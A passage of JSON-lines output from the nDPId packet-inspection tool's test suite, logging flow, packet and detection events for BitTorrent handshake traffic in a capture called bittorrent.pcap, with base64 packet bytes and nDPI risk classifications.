\/\/\/v\/\/\/\/\/\/\/7\/\/\/\/7+\/+\/\/\/+\/\/\/\/\/v\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/8\/\/\/\/\/\/\/f\/\/\/\/3\/\/\/\/\/\/\/\/+AAAAABQQAAAI1AAAABQQAAAEuAAAABQQAAABqAAAABQQAAAE\/AAAABQQAAABtAAAABQQAAAKkAAAABQQAAAElAAAABQQAAAL5AAAABQQAAANYAAAABQQAAAA2AAAABQQAAAIPAAAABQQAAAJBAAAABQQAAAAOAAAABQQAAAMMAAAABQQAAAJ5AAAABQQAAAF6AAAABQQAAAJZAAAABQQAAAATAAAABQQAAAM4AAAABQQAAAItAAAABQQAAAHdAAAABQQAAAEPAAAABQQAAAMNAAAABQQAAABX"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455469975234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975234,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WJNAAEAGAADAqAEDlxpfHs6vWJEERbWJ8qKonIAYJJ+4TgAAAQEIChncDxURKgrLE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhul1XASmRgFxRA="}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455469975240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975240,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4VgZAAEAGAADAqAEDl0j\/o86w6hjbuZSz\/XvqFoAYKEhZAgAAAQEIChncDxoAaM\/9E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpHIptJ+s3GSLpo="}
00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975265,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4dKFAAEAGAADAqAEDTzXkAs6tOSO1PcfcBOlxsoAYN4r1TQAAAQEIChncDzIAAH\/nE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpuHBUmeY0dBAis="}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455469975295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1455469975295,"pkt":"xCwDBkn+LFbcjDU0CABFAACPKABAAHIGh9GXSP+jwKgBA+oYzrD9e+oW27mU94AYAQF3EQAAAQEICgBo0AMZ3A8aE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopW+kcQUcjSA5QoAAADnFABkMTplaTBlNDppcHY0NDqXSA=="}
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455469975314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1455469975314,"pkt":"xCwDBkn+LFbcjDU0CABFAACdCeVAAHIGRpKXGl8ewKgBA1iRzq\/yoqicBEW1zYAYHVwArAAAAQEIChEqCxYZ3A8VE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coV7lk33H8ZRraqcAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVf"}
00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455469975341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":449,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":449,"pkt_l4_len":415,"thread_ts_msec":1455469975341,"pkt":"LFbcjDU0xCwDBkn+CABFAAGz+chAAEAGAADAqAEDUjrYc86rlaExvR16+FTQoYAY\/\/\/t\/gAAAQEIChncD3wAhEZHAAAA+hQAZDE6ZWkwZTQ6aXB2NDQ6UjfNATQ6aXB2NjE2Ov6AAAAAAAAAxiwD\/\/4GSf4xMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0MDk1OWU0OnJlcXFpMjU1ZTE6djE5OsK1VG9ycmVudCBNYWMgMS44LjY2OnlvdXJpcDQ6UjrYc2UAAAABDwAAAAMJn\/8AAAADFAMAAAAAAQIAAABlFAZkODptc2dfdHlwZWkwZTM6bnVtaTIwZTY6ZmlsdGVyNjQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGU="}
01314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455469975379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":600,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":600,"pkt_l4_len":566,"thread_ts_msec":1455469975379,"pkt":"xCwDBkn+LFbcjDU0CABFAAJKCedAAHIGROOXGl8ewKgBA1iRzq\/yoqkFBEW1zYAYHVwJbQAAAQEIChEqC1QZ3A9hYWdvaTJlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkyMjY3M2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTFlNjp5b3VyaXA0OlI3zQFlAAAAdAV\/v+\/\/f\/\/+\/\/\/\/\/\/\/\/\/\/fv\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/f\/\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/7\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/f\/\/\/\/7\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/9\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/ff+AAAAABQQAAAC+AAAABQQAAAB0AAAABQQAAAJcAAAABQQAAAOGAAAABQQAAAEaAAAABQQAAAA3AAAABQQAAAL2AAAABQQAAAOAAAAABQQAAAGXAAAABQQAAALiAAAABQQAAAIeAAAABQQAAAFXAAAABQQAAAJLAAAABQQAAAB7AAAABQQAAAI\/AAAABQQAAADyAAAABQQAAAAAAAAABQQAAAAgAAAABQQAAAH+AAAABQQAAANsAAAABQQAAAATAAAABQQAAALWAAAABQQAAAAJAAAABQQAAAGq"}
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455469975393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1455469975393,"pkt":"LFbcjDU0xCwDBkn+CABFAADeIplAAEAGAADAqAEDl0j\/o86w6hjbuZVQ\/XvsloAYKDdZaAAAAQEIChncD64AaNAEMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEyOnV0X3JlY29tbWVuZGk1ZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0OpdI\/6NlAAAAAQ8="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975407,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4fvZAAEAGAADAqAEDeD4h8c6umaQbpzY0C9TW44AYjjZcRQAAAQEIChncD7sAQ+m5E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhq4aGFIV+2F24M="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975622,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4JlBAAEAGAADAqAEDTzeBFs6sL0FM+lulp3q\/xoAYVhCSYwAAAQEIChncEJACXeJGE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsY\/A3YcaePRRY8="}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1455469976336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976336,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4SfNAAEAGAADAqAEDxmSSCc6z6wOon+tuBozVl4AYZVEahAAAAQEIChncE1MB8nMrE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkC3tYvcSfI56Y="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1455469976513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469976513,"pkt":"xCwDBkn+LFbcjDU0CABFEACEZqRAAHYGg6bGZJIJwKgBA+sDzrMGjNWXqJ\/rsoAYAQLT1gAAAQEICgHycz0Z3BNTE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wokMyLr47j7jk1aEAAADnFABkMTplaTA="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1455469976582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976582,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4BctAAEAGAADAqAEDvmfDOM6ytinSUvXkM6bvoIAY+3dDtgAAAQEIChncFEcAv3iAE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkKv+eYrLs2+ChY="}
00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
01351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1455469976697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1455469976697,"pkt":"xCwDBkn+LFbcjDU0CABFEAJjaOxAAHYGf3\/GZJIJwKgBA+sDzrMGjNXnqJ\/rsoAYAQJs0QAAAQEICgHyc00Z3BQDZTQ6aXB2NDQ6xmSSCTEyOmNvbXBsZXRlX2Fnb2kxZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTE1ZTY6eW91cmlwNDpSN80BZQAAAHQFv\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/f\/\/\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/f\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/9\/\/\/\/\/\/7\/\/\/7\/+7\/\/f\/3\/f\/\/\/\/v\/\/\/\/\/\/\/9\/9\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/3\/\/\/\/gAAAAAUEAAAClgAAAAUEAAAA6gAAAAUEAAAAugAAAAUEAAAA4AAAAAUEAAABqgAAAAUEAAACZwAAAAUEAAACTwAAAAUEAAAC8gAAAAUEAAABiQAAAAUEAAAB3QAAAAUEAAADdAAAAAUEAAAC\/gAAAAUEAAACJgAAAAUEAAACiAAAAAUEAAACvwAAAAUEAAACeQAAAAUEAAABRQAAAAUEAAACCwAAAAUEAAAAkgAAAAUEAAACdQAAAAUEAAACoAAAAAUEAAAAAQAAAAUEAAAAFAAAAAUEAAADTw=="}
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1455469977023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1455469977023,"pkt":"xCwDBkn+LFbcjDU0CABFAACFWMJAAHMGa2W+Z8M4wKgBA7YpzrIzpu+g0lL2KIAYAQKm2wAAAQEICgC\/ehQZ3BRHE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xovjV8bH+iIGCHSYAAAEBFABkMTplaTBl"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1455469977229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469977229,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4L\/xAAEAGAADAqAEDlw8wvc61t5l0EJCE2E\/BJoAYIPWJ4gAAAQEIChncFslLXJigE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjv4JZL7rS4V2Vgo="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
